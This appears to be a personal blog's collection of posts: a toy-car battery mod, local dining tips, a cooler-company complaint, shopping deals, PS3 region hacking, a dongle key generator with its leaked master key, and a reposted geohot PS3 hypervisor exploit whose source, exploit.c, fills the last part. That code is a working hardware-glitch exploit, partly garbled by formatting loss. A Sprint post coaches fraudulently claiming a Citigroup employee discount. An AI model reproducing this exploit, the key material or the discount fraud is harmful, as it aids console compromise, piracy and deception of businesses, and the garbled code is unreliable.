12V to 18V Dune Racer Mod Simple

So my son is 4 and the dune racer just doesnt have the same speed appeal to a 4 year old.

I’ve seen others mod their power wheels so i did my research and found the easiest and best way is as follows:

I ordered the following:

2X Batteries “ExpertPower 12v 9ah Sealed Lead Acid Battery with F2 Terminals (.250″) / 2 Pack” $38.00

battery-power-wheels

https://www.amazon.com/gp/product/B01CUXW8HM/ref=oh_aui_detailpage_o04_s01?ie=UTF8&th=1

1X Wiring Harness with Built in 30 Amp. $14.99

connector

http://www.ebay.com/itm/351685021427?_trksid=p2057872.m2749.l2649&ssPageName=STRK%3AMEBIDX%3AIT

Here is the Wire Harness Connector plugged into the Stock battery adapter.

20170212_203038

What I did next was get the female F2 connectors and about 5 FT of Red back wire and run it to the 2 batteries in the front compartment.

 

Rockwall Texas – What’s for Dinner

I like to cook. I just hate to clean up afterwards.So i look to breakup the week and eat out one night.

Here are my top 3 picks for Rockwall Dinning out with kids

Lubys -Wednesdays Eat Free

Kyoto’s -Wednesdays Eat Free

Logans – Wednesdays Eat Free

 

Atlas Cooler Scam

 

So I wanted to vocalize just how upset I am at Atlas Coolers. More importantly Ben Jones the President of Atlas Coolers. The story goes a little like this…..

Prelude: It was June 15th and I was reading through Rokslide Forums when I came across a post about a new company ( Atlas Coolers) who was selling knockoff’s or what some people suggest a substitute to the already popular insulated coolers like Pelican, RTIC, & Yeti.

I thought to myself, “check into this new company do some research”. But, and there is always a but…  I already have a Yeti, and it is great, really great…. but the damn thing is so heavy when you fill it with ice and drinks.

Not to mention I also have a RTIC Cooler 20Qt hard shell and Softpak. Both of which have their own useful purposes and function. See my collection below:

unnamed

Some people who read this won’t understand my obsession or any mans obsession for certain items and I don’t expect you to.  Rational and logic goes out the door when we find toys we want.  I know that my wife doesn’t always get why we need so many different coolers but she has learned to adapt.Each has a purpose for the right moment.

Back to the story: The deal all started here:

http://www.rokslide.com/forums/gear-deals/46044-atlas-cooler-25-discount-buy-june-1-june-30-a-10.html

I did my research and decided I had a use for a new cooler, a different size and shape cooler. So I ordered one on June 18th. The order said to expect shipment in 7 to 10 days. No indication that their was a backlog on the site so I figured its just standard processing time.

The next time I checked was July 6th. Approx 15 Days later – I was greeted with a response that the product was delayed and ship the 3rd week of July.  7 Weeks later Eh…

At this point the product had hit some some delays. “That’s okay” I thought I could wait a few more weeks. Time went on… and on and on.. no email or update. Fast forward to Present Day and the Summer is almost over. It is now present day, August 31st and no product or announcement from the company when this so called cooler would show up. 12 Weeks and several false stories about why product is delayed from an untrusted source.

I went back to the forums to do some digging into what others might be saying. There is one lone wolf on the forums that claims he has been in contact with Ben. I’ve screenshot that man’s fairy tale of lies. All a hoax to keep the lie going while they probably funnel the money slowly from shopify.

What I found out is that no one has received S*H*I*T from this company. All we have is one lie after another from a guy who claims to be coordinating this heist. I took screenshots below of the long drawn out story of why after 90 days a cooler never appeared. I canceled tonight. Enough waiting.

I have also filed a complaint with the FTC and the BBB because this is the worst kind of company. A company who doesn’t answer to emails, a company who doesn’t communicate to its customers.

 

For those that find this blog please post if you ever get your cooler. Others like myself have started to cancel their orders because hunting season is here. Dove season Started Sept 1st.

 

capture 1

capture 2

capture 3

capture 4

capture 5

capture 6

capture 7

The Tuesday or Wednesday date would have been 8/23 or 8/24capture 8

Today is 8/31/2016 and their has been no shipment or tracking posted.

Call me crazy but i even managed to locate this assholes place of residence. Just to see if he was working out of a PO Box or in the middle of no where. And guess what….If you go to Texas Website of Registered companies

https://mycpa.cpa.state.tx.us/coa/coaSearch.do

atlas-address

I found the guy on linkedin so i messaged him on Tuesday 9/6/2016

capture

 

So some might still be interested in knowing why I have so many coolers.

The Yeti hardshell was my first Cooler. I learned after a few events that it was not something you carry to a concert unless you have wheels. Hence the red cart.

My second cooler was the Yeti softpak. Nice cooler however, the damn thing scratches your hand pulling anything out of it. After the 6th beverage I was ready to return it but couldnt because it really was nice to have cool drinks after 5 hours of being in the sun.

My third cooler was the Hard Shell RTIC I got it because it has a handle and is portable without being too heavy when full.  I can sit on it or prop my feet up on it if i am in a lawn chair!

My 4th cooler is the softpak RTIC which probably gets the most use. It solved the dreaded hand issue that the yeti has. Its light enough that my wife can carry it since it has a strap and it holds just the right amount of beer. 15Pack of Miller Lite AL bottles. fit very nicely.

 

 

 

 

 

 

 

 

BLES01909-[Wolfenstein The New Order EU] to BLUS31220-[Wolfenstein The New Order] Conversion

This game would not play on my PS3 because it is a EU BLES release So I had to manually hack the game and convert to US BLUS. Below are the steps that I did to accomplish this.

Rename BLES01909-[Wolfenstein The New Order EU] to BLUS31220-[Wolfenstein The New Order]

Copy these 3 files from the following directories
PS3_GAME/PARAM.SFO
PS3_DISC.SFB
PS3_GAME/LICDIR/LIC.DAT

Open PS3TOOLS ( if you do not have you will need to download from ps3tools.aldostools.org)
Open PARAM SFO EDITOR –>
Go into \BLUS31220-[Wolfenstein The New Order]\PS3_GAME\PARAM.SFO
Open PARAM.SFO
Changed Title ID FROM “BLES01909” to “BLUS31220”
Change Title to “Wolfenstein: The New Order”
Save

Open PS3 DISC SFB EDITOR –>
Go into \BLUS31220-[Wolfenstein The New Order]\PS3_DISC.SFB
Open PS3_DISC.SFB
Change BLES01909 to BLUS31220
Save

From PS3TOOLS go to Cheats
OPEN HxD
Go into \BLUS31220-[Wolfenstein The New Order]\PS3_GAME\LICDIR\LIC.DAT
Open LIC.DAT
FIND BLES01909 rewrite to BLUS31220 and save.
(Should be line 00000800)
Save

Move to your media of choice and play. File should start right up and download the update.

Discounttiredirect.com $50 Off Black Friday 2011

I have been shopping for some Continential DWS tires for about 3 months for my G8 GT.

I’m glad I have held out this long.

I will use Fatwallets discount to stack with Blackfridays $50.00 off to get a really great price on my tires.

http://www.discounttiredirect.com/blackFriday.html

I posted on Slickdeals so rep if you like my find http://slickdeals.net/forums/showthread.php?t=3594702

I haven’t seen anyone else find this link this year!

Mark your calendars, Black Friday 2011 is coming soon! From Thursday, November 24th through Monday, November 28th, 2011 we’re offering a web-only deal that will save you money.

$50 Off a set of 4 tires or 4 wheels
$25 Off a set of 2 tires or 2 wheels
$100 Off a 4 tire and 4 wheel package

• Purchase online and see the savings in your cart instantly.

• Have your tires and wheels shipped directly to your door.

• This offer can be combined with other promotional offers.

Apple iPad 2 purchase

I finally decided to get an Apple iPad 2. I have been looking for the right time to buy for over 60 days and recently I pulled the trigger. Since I am all about getting great deals I figured I would share my final price with the world. Knowing that apple does not discount its products especially the iPad 2 I had my work cutout for me. I researched Black Friday to gauge Apples likelihood of a sale. Thanks to slickdeals.com I found a post for the iPad 2 w/ an instant discount. Now I took some special circumstances to make this all happen. YMMV.

The breakdown goes like this:
$ 599.00 Apple.com doesn’t include the tax portion.

$ 611.00 Ipad 2 32 gig cost from Buy.com includes shipping
$ (36.01) Instant discount from Buy.com
$ 574.99 Total – Already below apple.com pricing
$ (30.55) 5% Discover cashback confirmed
$ 544.44 Total
$ 0.00 Tax no tax charged * sweet!
$ (57.50) Rakuten Super Points (5,750 or 100 pts = $1.00) 10X bonus when I purchased redeemable Nov 22nd
$ 486.94 Total
$(300.00) Chase promo signed up for chase freedom card
$186.94 Total
$(125.00) Citicard cashback. Cashback sitting there waiting to be spent
$61.94 Grand Total what i paid out of pocket

 

Chase 300.00 freedom CC offer that I used

http://slickdeals.net/forums/showthread.php?t=3459776

 

Sprint 27% Discounts

Corp ID: NADAY_ZZZ = 20% off thru Target.
Corp ID: NACIT_ZZZ= 27% off thru Citigroup.
Sprint 27% Discount thru Citigroup
Step 1 Go to http://www.mail.com and open up a NEW FREE E-Mail address for yourself. From the available addresses use the drop down arrow to view all of them. Choose the one: @post.com and create your own beginning. Example: dltv@post.com

It is free Email. Not really sure why you need a POST.com extention email address but just go with it.

Step 2 Goto http://www.Sprint.com and click on the link “Employee Discounts”. Here you will enter the new email address that you created above. It will say you have been approved and an email will be sent you to with instructions.

Typical replys from Sprint are 48 hrs and will look something like the following:

Quote:
Thank you for contacting Sprint.

We have received your request to participate in the NVP Discount
Program through Post.com. Unfortunately, we are unable to process your request to participate in the Program. The company you specified, Post.com, does not appear to be eligible for a discount through Sprint. It may be possible that your company is listed as a part of a larger company. If so, please reply to this e-mail with the name of the main or parent company your company is associated with. This will enable me to apply the discount to your account.

Thank you for choosing Sprint!

Sincerely,
xxxx
Sprint
just replay their mail saying that post.com is part of it Citigroup, and don’t forget mention the Corp ID: NACIT_ZZZ it’s for 27% off.

next thing you know they replay with an email just look like this
Quote:
Thank you for your reply.

I have updated the 27% employee discount for the employee of Citigroup.
So, you will begin receiving the Citigroup employee discount on the next
invoice. You will get the discount of 27% on all the MRC (Monthly
Recurring Charge) of the services except TEP (Total Equipment
Protection).

Congratulations on taking advantage of your company?s discount with
Sprint, we are excited to have you as a customer.

Thank you for emailing us. It was a pleasure assisting you and I look
forward to more opportunities to serve you in future. Have a great day!

Sincerely,
xxxx
My bill just got discounted for 27%, so it does work folks!!!

Mention Corp ID: NACIT_ZZZ

Everything Data w/Any Mobile, AnytimeSM

Starting at
$51.09
After discount
Reg. $69.99/month

Unlimited calling to any mobile in America
Unlimited Web
Unlimited text and picture messaging
Sprint TV® and Sprint Music
Sprint GPS Navigation
450 Anytime Minutes

$10/mo. Premium Data add-on is required for smartphones. Other monthly charges apply. See below**. Includes 450 Anytime Minutes. Existing Sprint customers can switch Sprint plans without a contract extension. New lines of activation require a new two-year Agreement. Excludes international, roaming and indirect calls.

X3MAX PS3 GIF – is not a fake afterall XTSE Creates PS3 Dongle ID Key Generator

I downloaded the compiled version of p3kgwn to see if if there was any meaning to X3 claim. You all remember that GIF image that everyone said was fake and no one could make sense of it. Well more progress has been made to the ps3 scene and I thought I’d help validate X3max. Thanks go out to Graf_Chokolo + Xtse for either work.

Below is the image and how to use the little app. It appears to be accurate. If you keep reading you will see why this is important.

X3 image deciphered
————–> IMAGE WAS TAKEN FROM X3MAX.COM

Originally Posted by Estx
Well, the master key is out and about now so here’s a convenient little application to generate your dongle id keys.

Straight forward to use.

p3kg – Xtse WINDOWS 2.0 Net Version

Code:
p3kgwn.exe 0xAAAB

Replacing 0xAAAB with whatever device ID you like. http://www.mediafire.com/?oi8yaop8njrmi2n
– download link for now

AFTER I TESTED THE APP IT TURNS OUT TO GIVE THE SAME RESULTS AS X3 CLAIMED.

C:\Users\Jeff\Desktop>p3kgwn 0x3BAD
p3kg (Windows .NET) – Xtse

Master Key
46 DC EA D3 17 FE 45 D8 09 23 EB 97 E4 95 64 10 D4 CD B2 C2

Device ID
3B AD

Device Key
2A 41 C2 93 F8 15 D8 91 65 6D C3 74 6D 0E 33 EC 7B 39 5B 92

Convientient JAVASCRIPT VERSION has been made http://www.teknoconsolas.es/usbdongle/usbdongle.html

Exporting Contacts from Palm Pre to HTC EVO

I just gave up on the Palm Pre. I got the HTV EVO for under 100 bucks after the tradein of my palm pre and walmart 100 gift card.
Keep in mind I missed the 99 dollar deal from Amazon.com for the HTC EVO.
My first goal to prep the transition is to get my contacts fully exported and imported.
I found this post and well so far so good.

This is how to get you contacts from your Sprint Palm PRE. You can create a .vcf file to import into most email programs.
• Open phone dialer on PRE or Pixi
• Type ##66623#
• Click on Export
• This creates the export file (.vcf)….The more contacts you have the longer it takes
• Connect your USB cable to the computer and also to the PRE when it prompts you too.
• Click on the USB Drive on your pre to mount to computer
• Once mounted on your computer, open windows explorer and the Palm PRE
• Find the folder called temp and open it (if you don’t find a temp folder, open folder options/view/and choose show hidden files/ then OK)
• You will find a file called PmMigration (this is the vcf file)
• Drag to your documents folder on your computer (PRE Backup folder) if you have one
• Use this file to import your contacts into Gmail, Yahoo, Hotmail or Outlook
• When you’re done Eject your Palm pre or safely remove hardware and then disconnect pre
• Your done….

Getting them to Gmail.
Follow the instructions in the above, and create the VCF file. Save it somewhere that it can easily be found. Go to Gmail and click on contacts, then in the upper right click on import. Import your VCF file. If it works it will tell you how many contacts it imported.

Once I got them to Gmail, it was wasy to get them to outlook as Gmail has a direct link to transfer contacts to outlook.

To make this transfer use this link.
http://office.microsoft.com/en-us/outlook-help/transfer-contacts-between-outlook-and-google-gmail-HA010222048.aspx

Hope this works for all of you. This was the only way I was able to get it all to work, and from what I can tell all the contact info went through, including addresses, email and phone numbers.


Thank you for your time,
Heidi Mercer

“I do believe I am making an impact. I know that cancer’s worst enemy is money. It is money that will pay for research. It is money that will provide services for cancer patients. It is money that will eventually find a cure and end the suffering. What I like about Relay is that we raise thousands of dollars, one dollar at a time. If you have a dollar you can fight cancer. There’s nothing greater than that.” M.Starr

“When you think about it, what other choice is there but to hope? We have two options, medically and emotionally: give up, or Fight Like Hell.”
Lance Armstrong

Geohot’s PS3 exploit released 1.26.2010 PS3 HACKED

Geohot’s PS3 Exploit released for download

Geohot has released the exploit that will allow for the PS3 to be hacked. This is what the hacking community have been waiting for. Geohot’s PS3 exploit will have the console hacking scene raving in hours. This is not for the average user only experienced hackers will be comfortable with this code.

[Quote]

“In the interest of openness, I’ve decided to release the exploit. Hopefully, this will ignite the PS3 scene, and you will organize and figure out how to use this to do practical things, like the iPhone when jailbreaks were first released. I have a life to get back to and can’t keep working on this all day and night.

Please document your findings on the psDevWiki. They have been a great resource so far, and with the power this exploit gives, opens tons of new stuff to document. I’d like to see the missing HV calls filled in, nice memory maps, the boot chain better documented, and progress on a 3D GPU driver. And of course, the search for a software exploit.

This is the coveted PS3 exploit, gives full memory access and therefore ring 0 access from OtherOS. Enjoy your hypervisor dumps. This is known to work with version 2.4.2 only, but I imagine it works on all current versions. Maybe later I’ll write up how it works

Good luck!”

Download Geohot’s PS3 exploit
http://geohotps3.blogspot.com/2010/01/heres-your-silver-platter.html

Download Geohot’s ps3 exploit in zip format

there are 5 files contained in the zip file, two of which are just instruction’s in the form of a picture and .txt file.

the following are a list of files in the .zip folder

1.pokemehere.jpg
2.run.sh
3.exploit.c
4.makefile
5.instructions.txt

INSTRUCTIONS.TXT includes:
!!EXPLOIT IS FOR RESEARCH PURPOSES ONLY!!

Usage Instructions:

Compile and run the kernel module.

When the “PRESS THE BUTTON IN THE MIDDLE OF THIS” comes on, pulse the line circled in the picture low for ~40ns.
Try this multiple times, I rigged an FPGA button to send the pulse.
Sometimes it kernel panics, sometimes it lv1 panics, but sometimes you get the exploit!!
If the module exits, you are now exploited.

This adds two new HV calls,
u64 lv1_peek(16)(u64 address)
void lv1_poke(20)(u64 address, u64 data)
which allow any access to real memory.

The PS3 is hacked, its your job to figure out something useful to do with it.

http://geohotps3.blogspot.com/

exploit.c
// PS3 exploit code
// c2010 geohot
// I DO NOT CONDONE PIRACY, EXPLOIT IS FOR RESEARCH USE ONLY

#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include
#include
#include

#include
#include
#include
#include

#include

void hexdump(unsigned long *d, int l) {
int i;
for(i=0;i>12)&0xFFFFFFFFF;
}

#define LENGTH 0x1000000
#define COUNT 0x40

volatile unsigned long cache_clear[0x100000];

volatile int exploit_first_stage() {
unsigned long lpar, lpar2, crap, g1, glitch=0, status, i;
printk(KERN_ERR “allocate memory: %d\n”, lv1_allocate_memory(0x100000, 0x14, 0, 0, &lpar, &crap));
printk(KERN_ERR “PRESS THE BUTTON IN THE MIDDLE OF THIS\n”);

for(i=0;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
if( (g1 & 1) == 0 || (g1&0xFFFFFFFF00000000) == 0x0000FFFF00000000) {
// isn't valid or is previous crap
if(lv1_write_htab_entry(0,i,0x0000FFFF00000001|(i<<16) | ((((((i/8)^(((0x0000FFFF00000001|(i<>12) & 0x1FFF)) <>23)&0x1F)<<7) ,0x196|lpar) != 0) {
printk(KERN_ERR "bad HTAB write @ %X\n", i);
}
glitch++;
}
}
printk(KERN_ERR "added 0x%X HTAB entries\n", glitch);

volatile register unsigned long j, t1, t2, k, l;

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0, stack;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

// get craps in the icache
lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar2, &crap);
lv1_release_memory(lpar2);

for(j=0;j<LENGTH;j++) {
if(j==(LENGTH/2)) {
t1 = mftb();
status = lv1_release_memory(lpar);
t2 = mftb();
memset(cache_clear, 0xAA, 0x100000);
}
}

//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR "time was 0x%lx, 0x%x per, %d\n", t2-t1, (t2-t1)/glitch, status);

t1 = 0;
t2 = 0;

for(i=0;i0) {
printk(KERN_ERR “EXPLOIT ENTRY FOUND!!!!!\n”);
return 0;
}

return -1;
}

unsigned long SLB[128];

// 64 entries in the SLB
inline int read_slb() {
unsigned long i, j;
unsigned long *entry;
for(i=0;i<64;i++) {
entry = &SLB[i*2];
__asm__ volatile("slbmfee 3, %0\n"
"std 3, 0(%1)\n"
"slbmfev 3, %0\n"
"std 3, 8(%1)\n"
:
: "r" (i), "r" (entry)
: "r3");
}
return 0;
}

// move into another virtual address space

unsigned long HTAB_0[0x20000];
unsigned long HTAB_1[0x20000];

volatile long hypercall_in_c() {
return 0x8FFFFFFEF;
}

volatile long call_hypercall_tlbia(unsigned long* r4) {
unsigned long ret;
unsigned long inr4 = *r4, outr4;
asm volatile("mr 3, %2\n"
"li 11, 16\n"
"sc 1\n"
"mr %0, 3\n"
"mr %1, 4\n"
: "=r" (ret), "=r" (outr4)
: "r" (inr4)
: "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12" );
*r4 = outr4;
return ret;
}

volatile int exploit_second_stage() {
unsigned long crap, j, slb1, slb2, msr, hsprg0;
unsigned long i, g1, g2, status, raff_ptr;
unsigned long vas_id, old_vas_id;
unsigned long act_htab_size;
//2, (24<<56)|(16<<48)
printk(KERN_ERR "construct address space: %d\n", lv1_construct_virtual_address_space(20, 2, 0x1814000000000000, &vas_id, &act_htab_size));
lv1_get_virtual_address_space_id_of_ppe(0, &old_vas_id);
printk(KERN_ERR "address space is %d, old was %d\n", vas_id, old_vas_id);
if(vas_id == 0) {
printk(KERN_ERR "ADDRESS SPACE FAIL\n");
return 0;
}

read_slb();
for(i=0;i>27)&1) {
printk(KERN_ERR “%lx %lx\n”, SLB[i*2]&0xFFFFFFFFF0000000, SLB[(i*2)+1]>>12);
}
}
//hexdump(SLB, 128);

unsigned long htab_lpar;
lv1_map_htab(0, &htab_lpar);
unsigned long htab_ra = get_real_address_from_lpar(htab_lpar);

unsigned long other_htab_lpar;
lv1_map_htab(vas_id, &other_htab_lpar);
unsigned long* other_htab = __ioremap(other_htab_lpar, 0x100000, 3);
unsigned long other_htab_ra = get_real_address_from_lpar(other_htab_lpar);

printk(KERN_ERR “fix values are %lx %lx\n”, other_htab_lpar, vas_id);

// add the messed up one
for(raff_ptr=0;raff_ptr>12) == 0x400) ) {
printk(KERN_ERR “FOUND ENTRY %16.16lx %16.16lx @ %X\n”, g1, g2, raff_ptr);
break;
}
}
if(raff_ptr==0x10000) {
printk(KERN_ERR “EXPLOIT NOT FOUND\n”);
goto hard_die;
}

if(other_htab_ra != ((g2&0xFFFF000)>>12) ) {
printk(KERN_ERR “BAD ADDRESS OF REGIONS HTAB\n”);
goto die;
}

// add the segment
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
//slb2 = 0x0000FFFF00000400|(raff_ptr<>12) & 0x1FFF)) <>2)&1)?24:12);
printk(KERN_ERR “computed VA is %lx\n”, va);

unsigned long* other_htab_rw = va;
other_htab_rw[0] = 0x0000FFFF00000001;
other_htab_rw[1] = 0x0000000000000196|(htab_ra< %lx\n”, usb1_ra);
printk(KERN_ERR “0x4000001e0000 -> %lx\n”, usb2_ra);
printk(KERN_ERR “0x4000001f0000 -> %lx\n”, usb3_ra);
printk(KERN_ERR “0x400000200000 -> %lx\n”, usb4_ra);

// skip first entry, it’s mine and important
for(i=1;i<0x10000;i++) {
g1 = ((unsigned long*)0xD000080080000000)[i*2];
g2 = ((unsigned long*)0xD000080080000000)[(i*2)+1];
if(g1&1) {
unsigned long va = 0xFFFFFFFFFFFFFFFF, ra;
for(j=0;j>27)&1) {
if((SLB[(j*2)+1]>>12) == (g1>>12)) {
va = SLB[j*2]&0xFFFFFFFFF0000000;
}
}
}
if(va == 0xFFFFFFFFFFFFFFFF) {
continue;
//printk(KERN_ERR “ENTRY NOT FOUND IN SLB: %lx\n”, (g1>>12));
}
valid_count++;

va |= ((i/8)^((g1>>(7+5)) & 0x1FFF)) <>2)&1)?24:12);
ra = g2 >> 12;

my_lpar = 0xFFFFFFFFFFFFFFFF;

if( ra >= 0x1000 && ra = 0x8000 ) {
my_lpar = (ra-0x8000) << 12;
} else {
my_lpar = 0x6c0058000000 | ((ra-0x1000)<<12);
}
} else if( (ra&0xFFFFFFFFFFFFFF00) == htab_ra) {
my_lpar = htab_lpar + ((ra-htab_ra) << 12);
} else if( (ra&0xFFFFFFFFFFFFFF00) == other_htab_ra) {
my_lpar = other_htab_lpar + ((ra-other_htab_ra) <= 0x28000080 && ra %lx\n”, i, g1, g2, va, ra);
}

if(other_htab[i*2] != g1 || other_htab[(i*2)+1] != g2) {
printk(KERN_ERR “verify failed on %X\n”, i);
printk(KERN_ERR “%lx %lx — %lx %lx\n”, g1, g2, other_htab[i*2], other_htab[(i*2)+1]);
//goto home;
}
}
}

printk(KERN_ERR “wrote 0x%X/0x%X htab entries\n”, count, valid_count);

hexdump(other_htab, 4);
printk(KERN_ERR “OOO R/W\n”);
hexdump(other_htab_rw, 4);

// add the segment different
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000400;
__asm__ volatile(“slbmte %0, %1\n”
:
: “r” (slb2), “r” (slb1) );

printk(KERN_ERR “GOING UNDERCOVER\n”);

//****************KERNEL CHILL TIME BEGIN****************
unsigned long irq, irq1, flags = 0;
irq = __pa(get_irq_chip_data(20));
irq1 = __pa(get_irq_chip_data(16));
spinlock_t mr_lock = SPIN_LOCK_UNLOCKED;
spin_lock_irqsave(&mr_lock, flags);
preempt_disable();
lock_kernel();
hard_irq_disable();
lv1_configure_irq_state_bitmap(1,0,0);
lv1_configure_irq_state_bitmap(1,1,0);
//****************KERNEL CHILL TIME BEGIN****************

status = lv1_select_virtual_address_space(vas_id);

// OMG, CRAZY, IN OTHER SPACE
unsigned long* htab_rw = 0x5000000000000000;
// middle part is 0 cause in position 0

// add htab r/w to itself
htab_rw[2] = 0x0000FFFF00000005;
htab_rw[3] = 0x0000000000000196;

lv1_select_virtual_address_space(old_vas_id);
//****************KERNEL CHILL TIME END****************
lv1_configure_irq_state_bitmap(1,1,irq1);
lv1_configure_irq_state_bitmap(1,0,irq);
__hard_irq_enable();
unlock_kernel();
preempt_enable();
spin_unlock_irqrestore(&mr_lock, flags);
//****************KERNEL CHILL TIME END****************

printk(KERN_ERR “prease i lived?!?!?: %d\n”, status);

// add the segment different again
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile(“slbmte %0, %1\n”
:
: “r” (slb2), “r” (slb1) );

home:
printk(KERN_ERR “unmap other HTAB: %d\n”, lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR “destruct address space: %d\n”, lv1_destruct_virtual_address_space(vas_id));

hexdump(0xD000080080000000, 0x10);

return 0;
die:
printk(KERN_ERR “unmap other HTAB: %d\n”, lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR “destruct address space: %d\n”, lv1_destruct_virtual_address_space(vas_id));
return -1;
hard_die:
printk(KERN_ERR “unmap other HTAB: %d\n”, lv1_unmap_htab(other_htab_lpar));
printk(KERN_ERR “destruct address space: %d\n”, lv1_destruct_virtual_address_space(vas_id));
return -2;
}

void add_segment() {
// add the segment different again
unsigned long crap, j, slb1, slb2;
crap = 0x5000000000000000;
__asm__ volatile(“slbie %0\n”
:
: “r” (crap) );

read_slb();
for(j=0;j>27)&1) == 0) {
break;
}
}
// j is first SLB I can use
slb1 = 0x5000000008000000|j;
slb2 = 0x0000FFFF00000500;
__asm__ volatile(“slbmte %0, %1\n”
:
: “r” (slb2), “r” (slb1) );
}

volatile long lv1_peek(unsigned long real_addr) {
unsigned long ret;
asm volatile(“mr 3, %1\n”
“li 11, 16\n”
“sc 1\n”
“mr %0, 3\n”
: “=r” (ret)
: “r” (real_addr)
: “r3”, “r4”, “r5”, “r6”, “r7”, “r8”, “r9”, “r10”, “r11”, “r12”);
return ret;
}

volatile long lv1_poke(unsigned long real_addr, unsigned long data) {
unsigned long ret;
asm volatile(“mr 4, %2\n”
“mr 3, %1\n”
“li 11, 20\n”
“sc 1\n”
“mr %0, 3\n”
: “=r” (ret)
: “r” (real_addr), “r” (data)
: “r3”, “r4”, “r5”, “r6”, “r7”, “r8”, “r9”, “r10”, “r11”, “r12”);
return ret;
}

void install_hypercall() {
unsigned long lpar, crap;

hexdump(0xD000080080000000, 0x10);

if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
printk(KERN_ERR “killer entry NOT present\n”);
return 0;
}

printk(KERN_ERR “allocate memory: %d\n”, lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar, &crap));
unsigned long* hypercall_in_zero_page = __ioremap(lpar, 0x1000, PAGE_SHARED_X);

hypercall_in_zero_page[0] = 0xE86300004E800020;
hypercall_in_zero_page[1] = 0xF883000038600000;
hypercall_in_zero_page[2] = 0x4E80002000000000;

unsigned long real_address = get_real_address_from_lpar(lpar)<<12;

add_segment();
unsigned long* hv_call_table = 0x500000000037C598;
hv_call_table[16] = real_address;
hv_call_table[20] = real_address+0x8;
printk(KERN_ERR "calling hypercall test got %16.16lx\n", lv1_peek(0x2401FC00000));
}

volatile int init_module() {
if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
while(exploit_first_stage() == -1);
while(exploit_second_stage() == -1);
}
install_hypercall();
return 0;
}

void cleanup_module(void) {
printk(KERN_ERR "cleanup_module() called\n");
}

~geohot